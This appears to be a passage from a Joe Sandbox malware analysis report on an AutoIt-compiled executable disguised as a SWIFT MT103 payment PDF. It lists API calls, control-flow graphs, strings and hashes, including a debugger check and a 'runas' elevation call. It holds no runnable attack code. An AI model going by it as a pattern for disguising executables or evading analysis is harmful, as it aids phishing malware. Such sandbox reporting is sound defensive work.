                                                        • Instruction Fuzzy Hash: 34238170A043109FD724DF25D480A6BB7E1BF89304F54896EE84A9B391D739EC46CB9B

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
                                                          • Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
                                                          • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
                                                          • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 0040208E
                                                          • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020A4
                                                          • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020BA
                                                          • Part of subcall function 00401F80: _wcscpy.LIBCMT ref: 004020EF
                                                        • IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
                                                        • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe,00000104,?,004A7CF8,004A7CFC), ref: 0040D763
                                                          • Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483
                                                        • SetCurrentDirectoryW.KERNEL32(?,00000001,C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe,00000004), ref: 0040D7D6
                                                        • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,004846D6,00000010), ref: 00431AAB
                                                        • SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe,00000004), ref: 00431B0E
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe,00000004), ref: 00431B3F
                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00431B8B
                                                        • ShellExecuteW.SHELL32(00000000), ref: 00431B92
                                                          • Part of subcall function 004101F0: GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                          • Part of subcall function 004101F0: LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                          • Part of subcall function 004101F0: LoadIconW.USER32(?,00000063), ref: 0041021F
                                                          • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A4), ref: 00410232
                                                          • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A2), ref: 00410245
                                                          • Part of subcall function 004101F0: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                          • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
                                                          • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                          • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                          • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
                                                          • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E
                                                          • Part of subcall function 0040E1E0: _memset.LIBCMT ref: 0040E202
                                                          • Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
                                                        • String ID: @GH$@GH$C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                        • API String ID: 2493088469-1876332204
                                                        • Opcode ID: 1a0ed8742bd98226e3ba0f055742ccaca08136dd93b2b863f89549b94dfb798c
                                                        • Instruction ID: f6e0ab4c143dd9a1f797559286fb6c41f0380d60009eb7dc722615656bf0e84e
                                                        • Opcode Fuzzy Hash: 1a0ed8742bd98226e3ba0f055742ccaca08136dd93b2b863f89549b94dfb798c
                                                        • Instruction Fuzzy Hash: 0341F731618341ABD320F7A19C49BAF3BA4AB96704F04493FF941672D1DBBC9949C72E

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1395 47a999-47aa00 call 40c060 * 3 call 4092c0 1404 47aa02-47aa09 OleInitialize 1395->1404 1405 47aa10-47aa3a call 40fff0 CLSIDFromProgID call 4137d3 1395->1405 1404->1405 1410 47aa3c-47aa47 1405->1410 1411 47aa79-47aa8f 1405->1411 1414 47aa48-47aa76 call 4781ae call 402620 * 3 1410->1414 1412 47aa95-47aab4 CoCreateInstance 1411->1412 1413 47ab2c-47ab59 call 4580e1 1411->1413 1412->1410 1415 47aab6-47aad9 1412->1415 1413->1410 1421 47ab5f-47ab9b CoInitializeSecurity call 4131f0 call 4342a8 1413->1421 1426 47aadc-47aade 1415->1426 1436 47acb7 1421->1436 1437 47aba1-47abc7 call 4021e0 call 434b96 1421->1437 1426->1410 1429 47aae4-47ab29 call 467626 call 402620 * 3 1426->1429 1438 47acbe-47ad10 call 4131f0 CoCreateInstanceEx 1436->1438 1450 47abe3-47abf1 call 4646f6 1437->1450 1451 47abc9-47abe1 1437->1451 1438->1410 1448 47ad16-47ad1c 1438->1448 1448->1410 1452 47ad22-47ad29 1448->1452 1461 47abf6-47ac54 call 40df50 call 402620 call 460976 call 40df50 call 402620 1450->1461 1454 47ac58-47ac61 1451->1454 1456 47ad5b-47ad75 1452->1456 1457 47ad2b-47ad59 CoSetProxyBlanket 1452->1457 1458 47ac76-47ac7a 1454->1458 1459 47ac63-47ac74 call 4112d5 1454->1459 1456->1426 1462 47ad7b-47ad8d 1456->1462 1457->1456 1465 47ac7e-47acb5 1458->1465 1459->1465 1461->1454 1462->1414 1465->1438
                                                        APIs
                                                        • OleInitialize.OLE32(00000000), ref: 0047AA03
                                                        • CLSIDFromProgID.COMBASE(00000000,?), ref: 0047AA27
                                                        • CoCreateInstance.OLE32(?,00000000,00000005,004829C0,?), ref: 0047AAAA
                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
                                                        • _memset.LIBCMT ref: 0047AB7C
                                                        • _wcslen.LIBCMT ref: 0047AC68
                                                        • _memset.LIBCMT ref: 0047ACCD
                                                        • CoCreateInstanceEx.OLE32 ref: 0047AD06
                                                        • CoSetProxyBlanket.OLE32(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53
                                                        Strings
                                                        • NULL Pointer assignment, xrefs: 0047AD84
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CreateInitializeInstance_memset$BlanketFromProgProxySecurity_wcslen
                                                        • String ID: NULL Pointer assignment
                                                        • API String ID: 1588287285-2785691316
                                                        • Opcode ID: 850ce0bb28aece6e0e7f2ac54e89f2f6fcadfe9aaf272da4708e4c1afc89c03f
                                                        • Instruction ID: 16786b45dbc5194aa398acfc0f0ff3b91b98a178c64a073a91da7f4e0cb75f58
                                                        • Opcode Fuzzy Hash: 850ce0bb28aece6e0e7f2ac54e89f2f6fcadfe9aaf272da4708e4c1afc89c03f
                                                        • Instruction Fuzzy Hash: 54B10DB15083409FD320EF65C881B9FB7E8BBC8744F108E2EF58997291D7759948CB66

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1484 40e470-40e500 call 40c060 GetVersionExW call 4021e0 call 40e600 call 40e620 1493 40e506-40e509 1484->1493 1494 42accc-42acd1 1484->1494 1497 40e540-40e555 call 40ee70 1493->1497 1498 40e50b-40e51c 1493->1498 1495 42acd3-42acdb 1494->1495 1496 42acdd-42ace0 1494->1496 1500 42ad12-42ad20 1495->1500 1501 42ace2-42aceb 1496->1501 1502 42aced-42acf0 1496->1502 1513 40e557-40e573 GetCurrentProcess call 40ee30 1497->1513 1514 40e579-40e5a8 1497->1514 1503 40e522-40e525 1498->1503 1504 42ac9b-42aca7 1498->1504 1512 42ad28-42ad2d GetSystemInfo 1500->1512 1501->1500 1502->1500 1508 42acf2-42ad06 1502->1508 1503->1497 1509 40e527-40e537 1503->1509 1506 42acb2-42acba 1504->1506 1507 42aca9-42acad 1504->1507 1506->1497 1507->1497 1515 42ad08-42ad0c 1508->1515 1516 42ad0e 1508->1516 1510 42acbf-42acc7 1509->1510 1511 40e53d 1509->1511 1510->1497 1511->1497 1518 42ad38-42ad3d GetSystemInfo 1512->1518 1513->1514 1525 40e575 1513->1525 1514->1518 1519 40e5ae-40e5c3 call 40eee0 1514->1519 1515->1500 1516->1500 1519->1512 1524 40e5c9-40e5db call 40eea0 GetNativeSystemInfo 1519->1524 1528 40e5e0-40e5ef 1524->1528 1529 40e5dd-40e5de FreeLibrary 1524->1529 1525->1514 1530 40e5f1-40e5f2 FreeLibrary 1528->1530 1531 40e5f4-40e5ff 1528->1531 1529->1528 1530->1531
                                                        APIs
                                                        • GetVersionExW.KERNEL32 ref: 0040E495
                                                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                        • GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
                                                        • GetNativeSystemInfo.KERNELBASE(?,?), ref: 0040E5D3
                                                        • FreeLibrary.KERNEL32(?), ref: 0040E5DE
                                                        • FreeLibrary.KERNEL32(?), ref: 0040E5F2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_wcslen
                                                        • String ID: pMH
                                                        • API String ID: 2923339712-2522892712
                                                        • Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                        • Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
                                                        • Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                        • Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB
                                                        APIs
                                                        • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EB55,0040D86E), ref: 0040EB7B
                                                        • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: IsThemeActive$uxtheme.dll
                                                        • API String ID: 2574300362-3542929980
                                                        • Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                        • Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
                                                        • Opcode Fuzzy Hash: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                        • Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
                                                        • __wsplitpath.LIBCMT ref: 00410C61
                                                          • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                        • _wcsncat.LIBCMT ref: 00410C78
                                                        • __wmakepath.LIBCMT ref: 00410C94
                                                          • Part of subcall function 00413E3C: __wmakepath_s.LIBCMT ref: 00413E52
                                                          • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                          • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                          • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                        • _wcscpy.LIBCMT ref: 00410CCC
                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00020019,?), ref: 00410CE9
                                                        • RegQueryValueExW.ADVAPI32 ref: 00429BE4
                                                        • _wcscat.LIBCMT ref: 00429C43
                                                        • _wcslen.LIBCMT ref: 00429C55
                                                        • _wcslen.LIBCMT ref: 00429C66
                                                        • _wcscat.LIBCMT ref: 00429C80
                                                        • _wcsncpy.LIBCMT ref: 00429CC0
                                                        • RegCloseKey.ADVAPI32(?), ref: 00429CDE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: _wcscat_wcslen$CloseException@8FileModuleNameOpenQueryThrowValue__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpystd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\
                                                        • API String ID: 1004883554-2276155026
                                                        • Opcode ID: d7f6643cad26fd3001d91627fc5ef1af4f656d40d4c5ca14c02d7ab544e78cf5
                                                        • Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
                                                        • Opcode Fuzzy Hash: d7f6643cad26fd3001d91627fc5ef1af4f656d40d4c5ca14c02d7ab544e78cf5
                                                        • Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A
                                                        APIs
                                                          • Part of subcall function 00409A40: _wcslen.LIBCMT ref: 00409A61
                                                          • Part of subcall function 00409A40: CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                        • Sleep.KERNEL32(0000000A), ref: 00409870
                                                        • timeGetTime.WINMM ref: 00409880
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: BuffCharSleepTimeUpper_wcslentime
                                                        • String ID:
                                                        • API String ID: 3219444185-0
                                                        • Opcode ID: c038d4071518633a740acc5a54e026e208573efa437d9a063aeeb7a09e84b998
                                                        • Instruction ID: 79dfb759edd1749a95aa3438e3198289cebfc990e9c1b7da565b255c5aac8c6d
                                                        • Opcode Fuzzy Hash: c038d4071518633a740acc5a54e026e208573efa437d9a063aeeb7a09e84b998
                                                        • Instruction Fuzzy Hash: D422F171608342ABC724DF64C984BABB7A0BF89304F14492FE54997392D77CEC45CB9A

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1206 4161c2-4161d1 1207 4161d3-4161df 1206->1207 1208 4161fa 1206->1208 1207->1208 1209 4161e1-4161e8 1207->1209 1210 4161fd-416209 call 41aa31 1208->1210 1209->1208 1211 4161ea-4161f8 1209->1211 1214 416213-41621a call 416e29 1210->1214 1215 41620b-416212 call 41616a 1210->1215 1211->1210 1220 416224-416233 call 41843a call 41b669 1214->1220 1221 41621c-416223 call 41616a 1214->1221 1215->1214 1228 416235-41623c call 4117af 1220->1228 1229 41623d-416258 GetCommandLineW call 42235f call 4222b1 1220->1229 1221->1220 1228->1229 1236 416262-416269 call 422082 1229->1236 1237 41625a-416261 call 4117af 1229->1237 1242 416273-41627c call 41186e 1236->1242 1243 41626b-416272 call 4117af 1236->1243 1237->1236 1248 416285-41628d call 42203c 1242->1248 1249 41627e-416284 call 4117af 1242->1249 1243->1242 1254 416295-416297 1248->1254 1255 41628f-416293 1248->1255 1249->1248 1256 416298-4162a0 call 40d7f0 1254->1256 1255->1256 1258 4162a5-4162ab 1256->1258 1259 4162b3-41630f call 411a4b call 4171d1 1258->1259 1260 4162ad-4162ae call 411a1f 1258->1260 1260->1259
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: __amsg_exit$_fast_error_exit$CommandInitializeLine__cinit__ioinit__mtinit__wsetargv__wsetenvp__wwincmdln
                                                        • String ID:
                                                        • API String ID: 2477803136-0
                                                        • Opcode ID: 5c6ad9204277a855c32b49e0d8ca3a5fd5782e976c2a5896ff1cb7bad4d5bdf3
                                                        • Instruction ID: 5d71fe406d9f608d9de966b229f2038f561e79c4b175df4472a1e640f9164680
                                                        • Opcode Fuzzy Hash: 5c6ad9204277a855c32b49e0d8ca3a5fd5782e976c2a5896ff1cb7bad4d5bdf3
                                                        • Instruction Fuzzy Hash: 6A21A671D00315A9DB14BBB2A9467EE2664AF1074CF1144AFF9056A2D3EEBCC8C1461D

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1268 479921-47995f 1269 479965-479969 1268->1269 1270 479c79-479c94 call 4781ae 1268->1270 1269->1270 1272 47996f-479975 1269->1272 1272->1270 1273 47997b-479983 call 43550e 1272->1273 1277 479985-4799a0 call 4781ae 1273->1277 1278 4799a3-4799ab 1273->1278 1280 4799ad-4799c8 call 4781ae 1278->1280 1281 4799cb-4799d6 call 4112d5 1278->1281 1287 479a32 1281->1287 1288 4799d8-479a08 call 40fff0 1281->1288 1289 479a36-479a5a call 410f64 1287->1289 1288->1289 1297 479a0a-479a2f call 4137d3 call 4781ae 1288->1297 1295 479ab2-479ac3 1289->1295 1296 479a5c-479a65 1289->1296 1298 479ad5-479b26 VariantInit call 4131f0 1295->1298 1299 479ac5-479ad1 1295->1299 1300 479a69-479a83 call 476a8a 1296->1300 1315 479b68-479b6a 1298->1315 1316 479b28-479b2b 1298->1316 1299->1298 1308 479a85-479a8d 1300->1308 1309 479a91-479aac call 4781ae 1300->1309 1308->1300 1310 479a8f 1308->1310 1309->1295 1317 479c28 1309->1317 1310->1295 1320 479bc5-479bd7 call 467626 1315->1320 1321 479b6c-479b71 1315->1321 1318 479ba1-479bc3 call 4781ae VariantClear 1316->1318 1319 479b2d-479b65 1316->1319 1324 479c2e-479c30 1317->1324 1318->1324 1319->1315 1333 479c19-479c26 VariantClear 1320->1333 1334 479bd9-479be2 1320->1334 1321->1318 1322 479b73-479b9c call 4781ae VariantClear 1321->1322 1322->1324 1328 479c32 1324->1328 1329 479c4d-479c60 call 4137d3 1324->1329 1332 479c36-479c3a 1328->1332 1342 479c62-479c68 call 4137d3 1329->1342 1343 479c6b-479c76 1329->1343 1336 479c42-479c4b VariantClear 1332->1336 1337 479c3c-479c40 VariantClear 1332->1337 1333->1324 1338 479be6-479bf4 1334->1338 1336->1329 1336->1332 1337->1336 1340 479bf6-479bfe call 4355fd 1338->1340 1341 479c0b 1338->1341 1350 479c11-479c17 1340->1350 1351 479c00-479c09 call 4355fd 1340->1351 1345 479c0c call 467626 1341->1345 1342->1343 1345->1350 1350->1333 1350->1338 1351->1345
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CopyVariant$ErrorLast
                                                        • String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
                                                        • API String ID: 2286883814-4206948668
                                                        • Opcode ID: b252b94bb1eccd2d62b9595cdbb8fe767ebda7bb565d3519b11b5a978df4ff56
                                                        • Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
                                                        • Opcode Fuzzy Hash: b252b94bb1eccd2d62b9595cdbb8fe767ebda7bb565d3519b11b5a978df4ff56
                                                        • Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: __fread_nolock$_fseek_wcscpy
                                                        • String ID: FILE
                                                        • API String ID: 3888824918-3121273764
                                                        • Opcode ID: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                        • Instruction ID: c0f9aeb359a44d31a21a8716142a7f32772eb03c7b5129f1ec28ea3a2d041f76
                                                        • Opcode Fuzzy Hash: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                        • Instruction Fuzzy Hash: D541EFB1504300BBD310EB55CC81FEB73A9AFC8718F54491EFA8457181F679E644C7AA

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32 ref: 00410326
                                                        • RegisterClassExW.USER32 ref: 00410359
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                        • InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                        • LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                        • ImageList_ReplaceIcon.COMCTL32(00932288,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                        • API String ID: 2914291525-1005189915
                                                        • Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                        • Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
                                                        • Opcode Fuzzy Hash: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                        • Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00410209
